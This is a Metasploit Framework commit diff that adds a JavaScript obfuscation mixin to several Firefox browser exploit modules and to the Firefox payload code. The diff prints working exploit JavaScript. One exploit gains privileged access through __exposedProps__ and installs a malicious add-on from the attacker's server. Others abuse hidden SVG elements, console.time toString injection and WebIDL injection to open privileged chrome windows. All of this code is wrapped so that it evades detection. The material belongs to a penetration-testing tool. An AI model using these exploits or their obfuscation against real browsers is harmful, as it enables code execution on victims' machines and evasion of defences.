Land rapid7#3844 - Add the JSObfu mixin to Firefox exploits

Author: wchen-r7

Gemfile.lock

@@ -5,7 +5,7 @@ PATH
       actionpack (< 4.0.0)
       activesupport (>= 3.0.0, < 4.0.0)
       bcrypt
-      jsobfu (~> 0.1.7)
+      jsobfu (~> 0.2.0)
       json
       metasploit-concern (~> 0.2.1)
       metasploit-model (~> 0.27.1)
@@ -91,7 +91,7 @@ GEM
     hike (1.2.3)
     i18n (0.6.11)
     journey (1.0.4)
-    jsobfu (0.1.7)
+    jsobfu (0.2.0)
       rkelly-remix (= 0.0.6)
     json (1.8.1)
     mail (2.5.4)

lib/msf/core/exploit/android.rb

@@ -20,7 +20,7 @@ module Exploit::Android
 
   def add_javascript_interface_exploit_js(arch)
     stagename = Rex::Text.rand_text_alpha(5)
-    script = %Q|
+    %Q|
       function exec(runtime, cmdArr) {
         var ch = 0;
         var output = '';
@@ -84,9 +84,6 @@ def add_javascript_interface_exploit_js(arch)
 
       for (i in top) { if (attemptExploit(top[i]) === true) break; }
     |
-
-    # remove comments and empty lines
-    script.gsub(/\/\/.*$/, '').gsub(/^\s*$/, '')
   end
 
 

lib/msf/core/exploit/remote/firefox_privilege_escalation.rb

@@ -7,16 +7,24 @@
 #
 ###
 
+require 'msf/core/exploit/jsobfu'
+
 module Msf
 module Exploit::Remote::FirefoxPrivilegeEscalation
 
+  # automatically obfuscate anything that runs through `js_exec`
+  include Msf::Exploit::JSObfu
+
   # Sends the +js+ code to the remote session, which executes it in Firefox's
-  # privileged javascript context
+  # privileged javascript context. The code will be obfuscated if the JsObfuscate
+  # datastore option is set to 1 or higher.
+  #
   # @return [String] the results that were sent back. This can be achieved through
   #   calling the "send" function, or by just returning the value in +js+
   def js_exec(js, timeout=30)
     print_status "Running the privileged javascript..."
     token = "[[#{Rex::Text.rand_text_alpha(8)}]]"
+    js = js_obfuscate(js)
     session.shell_write("#{token}[JAVASCRIPT]#{js}[/JAVASCRIPT]#{token}")
     session.shell_read_until_token("[!JAVASCRIPT]", 0, timeout)
   end

lib/msf/core/payload/firefox.rb

@@ -1,9 +1,13 @@
 # -*- coding: binary -*-
 require 'msf/core'
+require 'msf/core/exploit/jsobfu'
 require 'json'
 
 module Msf::Payload::Firefox
 
+  # automatically obfuscate every Firefox payload
+  include Msf::Exploit::JSObfu
+
   # Javascript source code of setTimeout(fn, delay)
   # @return [String] javascript source code that exposes the setTimeout(fn, delay) method
   def set_timeout_source
@@ -121,14 +125,15 @@ def run_cmd_source
           var retVal = null;
 
           try {
-            retVal = Function('send', js[1])(function(r){
+            this.send = function(r){
               if (sent) return;
               sent = true;
               if (r) {
                 if (sync) setTimeout(function(){ cb(false, r+tag+"\\n"); });
                 else      cb(false, r+tag+"\\n");
               }
-            });
+            };
+            retVal = Function(js[1]).call(this);
           } catch (e) { retVal = e.message; }
 
           sync = false;

metasploit-framework.gemspec

@@ -56,7 +56,7 @@ Gem::Specification.new do |spec|
   # Needed for some admin modules (cfme_manageiq_evm_pass_reset.rb)
   spec.add_runtime_dependency 'bcrypt'
   # Needed for Javascript obfuscation
-  spec.add_runtime_dependency 'jsobfu', '~> 0.1.7'
+  spec.add_runtime_dependency 'jsobfu', '~> 0.2.0'
   # Needed for some admin modules (scrutinizer_add_user.rb)
   spec.add_runtime_dependency 'json'
   # Metasploit::Concern hooks

modules/exploits/android/browser/webview_addjavascriptinterface.rb

@@ -74,6 +74,8 @@ def initialize(info = {})
         :os_flavor  => 'Android'
       }
     ))
+
+    deregister_options('JsObfuscate')
   end
 
   # Hooked to prevent BrowserExploitServer from attempting to do JS detection

modules/exploits/multi/browser/firefox_proto_crmfrequest.rb

@@ -79,21 +79,7 @@ def generate_html(target_info)
       "p2.constructor.defineProperty(obj,key,{get:runme});"
     end
 
-    %Q|
-      <html>
-      <body>
-      #{datastore['CONTENT']}
-      <div id='payload' style='display:none'>
-      if (!window.done) {
-        window.AddonManager.getInstallForURL(
-          '#{get_module_uri}/addon.xpi',
-          function(install) { install.install() },
-          'application/x-xpinstall'
-        );
-        window.done = true;
-      }
-      </div>
-      <script>
+    script = js_obfuscate %Q|
       try{InstallTrigger.install(0)}catch(e){p=e;};
       var p2=Object.getPrototypeOf(Object.getPrototypeOf(p));
       p2.__exposedProps__={
@@ -116,6 +102,28 @@ def generate_html(target_info)
       };
       for (var i in window) register(window, i);
       for (var i in document) register(document, i);
+    |
+
+    js_payload = js_obfuscate %Q|
+      if (!window.done) {
+        window.AddonManager.getInstallForURL(
+          '#{get_module_uri}/addon.xpi',
+          function(install) { install.install() },
+          'application/x-xpinstall'
+        );
+        window.done = true;
+      }
+    |
+
+    %Q|
+      <html>
+      <body>
+      #{datastore['CONTENT']}
+      <div id='payload' style='display:none'>
+        #{js_payload}
+      </div>
+      <script>
+        #{script}
       </script>
       </body>
       </html>

modules/exploits/multi/browser/firefox_svg_plugin.rb

@@ -129,24 +129,7 @@ def generate_html(cli, target)
       :loader_path      => "#{get_module_uri}.swf",
       :content          => self.datastore['CONTENT'] || ''
     }
-    %Q|
-      <!doctype html>
-      <html>
-      <head>
-        <base href="chrome://browser/content/">
-      </head>
-      <body>
-
-      <svg style='position: absolute;top:-500px;left:-500px;width:1px;height:1px'>
-        <symbol id="#{vars[:symbol_id]}">
-          <foreignObject>
-            <object></object>
-          </foreignObject>
-        </symbol>
-        <use />
-      </svg>
-
-      <script>
+    script = js_obfuscate %Q|
       var #{vars[:payload_obj_var]} = #{JSON.unparse({vars[:payload_key] => vars[:payload]})};
       var #{vars[:payload_var]} = #{vars[:payload_obj_var]}['#{vars[:payload_key]}'];
       function $() {
@@ -169,6 +152,27 @@ def generate_html(cli, target)
       document.querySelector('use').setAttributeNS(
         "http://www.w3.org/1999/xlink", "href", location.href + "##{vars[:symbol_id]}"
       );
+    |
+
+    %Q|
+      <!doctype html>
+      <html>
+      <head>
+        <base href="chrome://browser/content/">
+      </head>
+      <body>
+
+      <svg style='position: absolute;top:-500px;left:-500px;width:1px;height:1px'>
+        <symbol id="#{vars[:symbol_id]}">
+          <foreignObject>
+            <object></object>
+          </foreignObject>
+        </symbol>
+        <use />
+      </svg>
+
+      <script>
+      #{script}
       </script>
 
       <iframe style="position:absolute;top:-500px;left:-500px;width:1px;height:1px"

modules/exploits/multi/browser/firefox_tostring_console_injection.rb

@@ -74,7 +74,7 @@ def generate_html(target_info)
     key = Rex::Text.rand_text_alpha(5 + rand(12))
     opts = { key => run_payload } # defined in FirefoxPrivilegeEscalation mixin
 
-    js = Rex::Exploitation::JSObfu.new(%Q|
+    js = js_obfuscate %Q|
       var opts = #{JSON.unparse(opts)};
       var key = opts['#{key}'];
       var y = {}, q = false;
@@ -85,9 +85,7 @@ def generate_html(target_info)
         return 5;
       };
       console.time(y);
-    |)
-
-    js.obfuscate
+    |
 
     %Q|
       <!doctype html>

modules/exploits/multi/browser/firefox_webidl_injection.rb

@@ -79,7 +79,7 @@ def generate_html(target_info)
                "{},function(){top.vvv=window.open('chrome://browser/content/browser.xul', "+
                "'#{r}', 'chrome,top=-9999px,left=-9999px,height=100px,width=100px');})<\/script>"
 
-    js = Rex::Exploitation::JSObfu.new(%Q|
+    js = js_obfuscate %Q|
       var opts = #{JSON.unparse(opts)};
       var key = opts['#{key}'];
 
@@ -127,10 +127,7 @@ def generate_html(target_info)
           setTimeout(function(){top.vvv.close();}, 100);
         }, 10);
       }
-
-    |)
-
-    js.obfuscate
+    |
 
     %Q|
       <!doctype html>